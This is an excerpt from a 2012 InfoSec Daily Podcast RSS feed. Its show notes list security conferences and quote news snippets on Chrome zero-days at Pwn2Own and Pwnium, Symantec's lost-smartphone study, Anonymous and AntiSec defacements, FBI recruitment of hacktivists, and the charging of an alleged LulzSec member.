<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Google has released a</span><a href="http://googlechromereleases.blogspot.com/2012/03/chrome-stable-channel-update.html"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">patch</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> a day after Sergey Glazunov hacked its browser with a pair of zero-day flaws. The update covers Windows, Mac OS X, Linux and Chromium OS.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Google&#39;s Chrome fell to two separate attacks on Wednesday evening, both based on previously unknown vulnerabilities during competitions at the CanSecWest conference.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The first hack was demonstrated by a team representing Vupen Security within the first five minutes of the Pwn2Own contest, organised by HP Tippingpoint. The second hack was performed by Glazunov, who demonstrated a &quot;full Chrome exploit&quot; in the Google-sponsored Pwnium contest.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://digitallife.today.msnbc.msn.com/_news/2012/03/08/10595092-exclusive-the-lost-cell-phone-project-and-the-dark-things-it-says-about-us"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://digitallife.today.msnbc.msn.com/_news/2012/03/08/10595092-exclusive-the-lost-cell-phone-project-and-the-dark-things-it-says-about-us</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">What would you do if you found a smartphone on the subway or at a coffee shop? If you&#39;re like most Americans, you&#39;d rummage through the phone looking for photos, emails and even private banking information. And the chances are only 50-50 that you would try to return the phone.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Computer security firm Symantec Corp. recently conducted an elaborate, first-of-its-kind study on lost smartphones and shared the results exclusively with TODAY and msnbc.com. The company set a trap for human nature, then sat back and watched. The results were not pretty. &nbsp;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Symantec researchers intentionally lost 50 smartphones in cities around the U.S. and in Canada. They were left on newspaper boxes, park benches, elevators and other places that passers-by would quickly spot them. But these weren&#39;t just any phones &#8212; they were loaded with tracking and logging software so Symantec employees could physically track them and keep track of everything the finders did with the gadgets.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.itworldcanada.com/news/anonymous-retaliates-again-releases-symantec-code/145036"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.itworldcanada.com/news/anonymous-retaliates-again-releases-symantec-code/145036</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">For the second time this week, hackers associated with the Anonymous hacking collective have taken down a website in retaliation for the arrests of several of their prominent members.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The latest victim is New York Ironworks, a supplier of police equipment and tactical gear based in New York City. The company&#39;s main Web page was defaced with a rambling message from AntiSec, a group affiliated with Anonymous, one of whose members was arrested this week.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The message expressed support for those who were arrested and anger at fellow hacker &quot;Sabu&quot; whose co-operation with the FBI contributed to this week&#39;s arrests. It included a brief diatribe against the FBI, a promise of more hacks Friday and a one-minute clip of the final moments of the movie the Fight Club.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;We will fight any individual, organization, corporation, and/or government that hinder our movement,&quot; the message said. &quot;While some of our methods may seem unjust we believe that the action taken is needed.&quot; Also posted on the defaced site was what appeared to be hundreds of usernames and passwords as well as evidence purporting to show that the hackers had gained root access to the server hosting the website.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">On Wednesday, members of Anonymous brought down Panda Security &#39;s PandaLabs website in retaliation for the arrests and what they claimed was Panda&#39;s role in previous arrests of Anonymous members.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Meanwhile, AntiSec members also released source code to Symantec&#39;s Norton Antivirus 2006 software in apparent tribute to those who were arrested this week. A 1.07GB file that is apparently the source code was published on Pastebin on Thursday.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><a href="http://www.nextgov.com/nextgov/ng_20120309_2012.php?oref=topstory"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.nextgov.com/nextgov/ng_20120309_2012.php</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The FBI increasingly is recruiting hacker activists to become moles, says a former hacktivist who advises the government. Many of the recruits have grown uneasy with alleged plans to disrupt industrial systems or have come to believe the government may not be as computer illiterate as they once perceived, said Jennifer Emick, who became a security consultant after exiting the loose-knit hacker collective Anonymous.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The about-face predates this week&#39;s revelation that Hector Xavier Monsegu &#8212; a one-time cyber ringleader &#8212; reportedly went undercover to help the FBI indict several of his former associates.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;Some of them have just had a change of heart about the whole thing,&quot; Emick said. &quot;I&#39;ve helped funnel some of them through,&quot; she said of other informants.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">But allies of Anonymous say the tactics the FBI used to net six hackers on Tuesday were elementary and subsequently have revitalized many dormant activists. The night of the government&#39;s announcement, hacktivists claimed responsibility for defacing websites run by the antivirus software company Panda Security and publishing more than 100 employee email usernames and passwords. The apprehended cyber marauders hailed from one or more hacktivist outlets, including AntiSec, LulzSec and Internet Feds.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Pointing to the crackdown&#39;s aftermath, Gregg Housh, a computer engineer affiliated with Anonymous, said, &quot;It seems to be a better recruiting tool for AntiSec and the Anons.&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Emick, however, said some of the younger Anonymous enthusiasts are now turned off by the collective&#39;s political leanings. A purported Anonymous member recently claimed to have posted sensitive information about Israel&#39;s supervisory control and data acquisition, or SCADA, systems on a public message board. &quot;When they start talking about SCADA, and power plants and a lot of anti-sematic rhetoric . . . Some of these guys are Jewish and say, &#39;Hey, I didn&#39;t sign up for this,&#39;&quot; she said.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p>	&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-615-chrome-0days-lost-phone-project-symantec-release-and-fed-recruits/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3610/0/infosec-daily-podcast-episode-615.mp3" length="22290895" type="audio/mpeg" />
		<itunes:duration>0:46:23</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 615 for March 9, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.
	[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 615 for March 9, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.
	&#160;
Announcements:
Social Engineering Training
	When: July 21-24, 2012
	Where: Black Hat Vegas
	When: August 20-24, 2012
	Where: &#160;Bristol, UK
	When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD 
	http://www.social-engineer.com/social-engineer-training
	InfoSec Southwest
	When: March 30-April 1
	Where: Austin, TX
	http://www.Infosecsouthwest.com
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	Huntington, West Virginia 
	http://aide.marshall.edu
	LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org
	CFP now open!
	&#160;
Security 504: Hacker Techniques, Exploits &#38; Incident Handling &#8211; Matt Romanek
When: June 20 &#8211; 27, 2012
	Where: Courtyard Seattle Federal Way, WA http://www.sans.org/mentor/details.php?nid=28014
	Inside and Out of the Social-Engineer Toolkit (SET)
	When: July 21 &#8211; 22, 2012
	When: July 23 &#8211; 24, 2012
	Where: Black Hat Vegas
	http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html
	Defcon 20
	When: July 26-29, 2012
	Where: Rio Hotel and Casino &#8211; Las Vegas, NV
	http://defcon.org/
	CFP &#38; Room reservations now open!
	DerbyCon 2012 &#8211; The &#8220;Deuce&#8221; Reunion
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	&#160;
Stories

	Source: http://www.theregister.co.uk/2012/03/09/pwn2own_pwnium_cansecwest/
	Google has released a patch a day after Sergey Glazunov hacked its browser with a pair of zero-day flaws. The update covers Windows, Mac OS X, Linux and Chromium OS.
	Google&#39;s Chrome fell to two separate attacks on Wednesday evening, both based on previously unknown vulnerabilities during competitions at the CanSecWest conference.
	The first hack was demonstrated by a team representing Vupen Security within the first five minutes of the Pwn2Own contest, organised by HP Tippingpoint. The second hack was performed by Glazunov, who demonstrated a &#34;full Chrome exploit&#34; in the Google-sponsored Pwnium contest.
	&#8230;
	Source: http://digitallife.today.msnbc.msn.com/_news/2012/03/08/10595092-exclusive-the-lost-cell-phone-project-and-the-dark-things-it-says-about-us
	What would you do if you found a smartphone on the subway or at a coffee shop? If you&#39;re like most Americans, you&#39;d rummage through the phone looking for photos, emails and even private banking information. And the chances are only 50-50 that you would try to return the phone.
	Computer security firm Symantec Corp. recently conducted an elaborate, first-of-its-kind study on lost smartphones and shared the results exclusively with TODAY and msnbc.com. The company set a trap for human nature, then sat back and watched. The results were not pretty. &#160;
	Symantec researchers intentionally lost 50 smartphones in cities around the U.S. and in Canada. They were left on newspaper boxes, park benches, elevators and other places that passers-by would quickly spot them. But these weren&#39;t just any phones &#8212; they were loaded with tracking and logging software so Symantec employees could physically track them and keep track of everything the finders did with the gadgets.
	&#8230;
	Source: [...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 614 &#8211; PwnedSauce, Odd Targets, WormPress Fake A/V, P2P Botnet and Body Scanner Bypass</title>
		<link>http://www.isdpodcast.com/episode-614-pwnedsauce-odd-targets-wormpress-fake-av-p2p-botnet-and-body-scanner-bypass</link>
		<comments>http://www.isdpodcast.com/episode-614-pwnedsauce-odd-targets-wormpress-fake-av-p2p-botnet-and-body-scanner-bypass#comments</comments>
		<pubDate>Fri, 09 Mar 2012 00:35:58 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3604</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 614 for March 8, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, and Karthik Rangarajan. &#160; Announcements: Social Engineering Training When: July 21-24, 2012 Where: Black Hat Vegas When: August 20-24, 2012 Where: &#160;Bristol, UK When: &#160;November 12-16, 2012 Where: &#160;Columbia, MD http://www.social-engineer.com/certified-training/ InfoSec Southwest When: March 30-April 1 [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 614 for March 8, 2012. &nbsp;</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, and Karthik Rangarajan.</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21-24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: August 20-24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: &nbsp;Bristol, UK</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Columbia, MD </span><br />
	<a href="http://www.social-engineer.com/certified-training/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/certified-training/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Southwest</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 30-April 1</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Austin, TX</span><br />
	<a href="http://www.infosecsouthwest.com/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.Infosecsouthwest.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Huntington, West Virginia </span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LayerOne 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 26-27, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Clarion Hotel &#8211; Anaheim, CA</span><br />
	<a href="http://www.layerone.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.layerone.org</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span><br />
	&nbsp;</p>
<h5 dir="ltr"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Security 504: Hacker Techniques, Exploits &amp; Incident Handling &#8211; Matt Romanek</span></h5>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: June 20 &#8211; 27, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Courtyard Seattle Federal Way, WA</span><a href="http://www.sans.org/mentor/details.php?nid=28014"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=28014</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Inside and Out of the Social-Engineer Toolkit (SET)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21 &#8211; 22, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 23 &#8211; 24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Black Hat Vegas</span><br />
	<a href="http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Defcon 20</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 26-29, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Rio Hotel and Casino &#8211; Las Vegas, NV</span><br />
	<a href="http://defcon.org/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://defcon.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP &amp; Room reservations now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; The &ldquo;Deuce&rdquo; Reunion</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.galwaynews.ie/24660-galway-hacker-faces-20-years-if-convicted"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.galwaynews.ie/24660-galway-hacker-faces-20-years-if-convicted</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A Claregalway man is facing the prospect of up to 20 years in a US prison after he was named this week by the FBI as a founder member of an international internet hacking group.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Darren Martyn from Cloonbiggeen, Claregalway, is charged with two counts of computer hacking conspiracy &ndash; each conspiracy count carries a maximum sentence of ten years in prison.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Mr Martyn is alleged by the FBI to be a member of &lsquo;LulzSec&rsquo;, a group of internet hackers that is a spin-off of the Anonymous hacking group. Both groups have launched numerous cyber attacks on high profile websites around the world.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Mr Martyn, a biopharmaceutical chemistry student at NUI Galway and a past pupil of Calasanctius College, Oranmore, is listed in the FBI&rsquo;s court papers as being 25, however, it is understood he is only 19 or 20.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">He along with four others, including one Offaly teenager Donncha O&rsquo;Cearbhail (19), and three others in the UK and US, were charged this week in New York for computer hacking and other crimes.</span></p>
